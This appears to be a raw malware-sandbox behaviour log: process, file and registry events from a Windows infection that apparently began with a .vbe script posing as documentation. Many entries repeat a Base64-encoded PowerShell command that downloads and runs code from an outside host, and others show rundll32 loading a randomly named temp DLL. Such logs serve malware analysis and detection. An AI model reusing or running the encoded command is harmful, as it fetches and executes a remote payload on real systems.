"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
256
5620
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
257
7928
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
258
4996
powershell.exe
3580
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
259
7060
powershell.exe
4524
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
260
8120
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
261
4308
powershell.exe
3732
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
262
8116
powershell.exe
3808
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
263
8804
powershell.exe
3784
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
264
6748
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
265
8000
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
266
7456
powershell.exe
3676
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
267
7964
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
268
6436
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
269
9276
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
270
9340
powershell.exe
3000
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
271
9428
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
272
9540
powershell.exe
5244
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
273
9572
powershell.exe
1304
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
274
9624
powershell.exe
3720
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
275
9692
powershell.exe
3908
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
276
10032
powershell.exe
3540
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
277
8252
rundll32.exe
3856
rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\5P5NRG~1\AppData\Local\Temp\vThQexNegi.dll,f0
C:\Windows\system32\
c:\windows\system32\rundll32.exe
Child_Of
Process
278
9396
rundll32.exe
8252
rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\5P5NRG~1\AppData\Local\Temp\vThQexNegi.dll,f0
C:\Windows\system32\
c:\windows\syswow64\rundll32.exe
File
STD_OUTPUT_HANDLE
File
users\5p5nrg~1\desktop\dokumentacja_92622.vbe
users\5p5nrg~1\desktop\dokumentacja_92622.vbe
c:\
c:\users\5p5nrg~1\desktop\dokumentacja_92622.vbe
vbe
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER
Enabled
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE
IgnoreUserSettings
Enabled
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE
IgnoreUserSettings
TrustPolicy
UseWINSAFER
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER
TrustPolicy
UseWINSAFER
WinRegistryKey
.vbe
HKEY_CLASSES_ROOT
WinRegistryKey
VBEFile\ScriptEngine
HKEY_CLASSES_ROOT
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE
IgnoreUserSettings
LogSecuritySuccesses
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER
LogSecuritySuccesses
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE
Timeout
DisplayLogo
WinRegistryKey
Software\Microsoft\Windows Script Host\Settings
HKEY_CURRENT_USER
Timeout
DisplayLogo
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
